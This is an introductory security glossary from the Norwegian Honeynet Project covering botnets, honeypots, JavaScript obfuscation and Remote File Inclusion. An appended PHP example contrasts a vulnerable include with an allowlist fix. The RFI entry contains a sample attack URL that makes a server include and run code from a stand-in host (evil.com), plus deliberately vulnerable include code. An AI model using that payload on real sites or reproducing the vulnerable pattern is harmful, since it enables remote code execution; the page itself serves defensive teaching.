Norwegian Honeynet Project


A chapter of the Honeynet Project

Quick Facts

March 2nd, 2008 by Tor Inge Skaar

What is a botnet?

The term “botnet” is mostly used to describe a collection of compromised computers or other network attached devices that are controlled and maliciously exploited by some individual or organization without the awareness of their owners. Each compromised host is also sometimes referred to as a “zombie” or simply a “bot”.


What is a client honeypot?

Client Honeypots (or honeyclients) are active security devices in search of malicious servers that attack clients. The client honeypot poses as a client and interacts with the server to examine whether an attack has occurred. Client honeypot technology can help the investigation of client-side computer attacks, detect and study malicious servers, collect malware pushed by malicious servers and be of great value when monitoring systems for client-side attacks and unauthorized modifications with client-side attack code.


What is a honeypot?

In computer terminology, a honeypot is a trap set to detect or deflect attempts at unauthorized use of information systems. Generally it consists of a computer, data or a network site that appears to be part of a network but which is actually isolated and protected, and which seems to contain information that would be of value to attackers.


What is a honeynet?

Two or more honeypots on a network form a honeynet. Typically, a honeynet is used for monitoring a larger and/or more diverse network in which one honeypot may not be sufficient. Honeynets and honeypots are usually implemented as parts of larger network intrusion-detection systems.


What is obfuscation?

Obfuscated code is source code or intermediate language in terms of computer programming that is very hard to read and understand, often intentionally. Programs known as obfuscators operate on source code, object code, or both, mainly for the purpose of deterring reverse engineering, disassembly, or decompilation.

JavaScript obfuscation is often used by malware authors to conceal parts of code that run browser exploits, or that redirect to pages containing exploits. The techniques use JavaScript’s dynamic nature—a piece of code is stored as an encrypted string, which is decrypted and evaluated. This may be done several times. Other techniques include insertion of dummy code, as well as dummy HTML links to legitimate pages.

Deobfuscation is the act of trying to make the obfuscated code intelligible.



What is RFI?

RFI or Remote File Inclusion is a special case of the more general input validation attacks, and is a technique used to attack Internet websites from a remote computer. Remote File Inclusion attacks allow malicious users to run their own code on a vulnerable website. The attacker is allowed to include his own malicious code in the space provided for programs on a web page. For instance, a piece of vulnerable PHP code would look like this:

include($page.'.php');

Here the variable $page may be defined in an HTTP GET request like http://www.example.com/index.php?page=foo, which would include the file foo.php and its code. Since the page variable is not subjected to any input validation by the code, an attacker may exploit this by changing the GET request to http://www.example.com/index.php?page=http://evil.com/bar.php? to get bar.php executed by example.com’s web server. For PHP this attack is possible most likely due to insecure use of one of these PHP configuration settings: register_globals or allow_url_fopen.

For more information, check Wikipedia’s RFI article.
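As an added example (not part of the original page), the vulnerable include pattern described above is shown next to a hardened version that maps the request parameter onto a fixed allowlist instead of building a path from user input. The function names, the pages/ directory and the page list are assumptions for illustration; note that in PHP 5.2 and later the separate allow_url_include setting, not allow_url_fopen, governs whether include() will fetch a URL.

```php
<?php
// Added example, not code from the Norwegian Honeynet Project page.
// Function names, the pages/ directory and the allowlist are assumptions.

// Vulnerable: $page flows straight from the query string into include().
// With URL includes enabled, a remote script named in ?page= is fetched
// and executed; even with them disabled, local files can still be
// included because nothing constrains the value.
function render_page_vulnerable(): void
{
    $page = $_GET['page'] ?? 'home';
    include($page . '.php');
}

// Hardened: user input never becomes part of a filesystem path.
// The request value is only a key into a fixed map of known pages.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

// Returns the absolute path of an allowed page, or null if the
// requested name is not on the allowlist (URLs, ../ sequences and
// unknown names all fall into the null case).
function resolve_page(string $requested): ?string
{
    if (!array_key_exists($requested, PAGES)) {
        return null;
    }
    return __DIR__ . '/pages/' . PAGES[$requested];
}

function render_page_hardened(): void
{
    $page = $_GET['page'] ?? 'home';
    $path = resolve_page($page);
    if ($path === null || !is_file($path)) {
        // Reject rather than guess; a rejected value such as
        // "http://..." is also worth logging for detection purposes.
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $path;
}
```

Regardless of the allowlist, keeping register_globals and allow_url_include off in php.ini removes the conditions the paragraph above names as the usual enablers of this attack.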
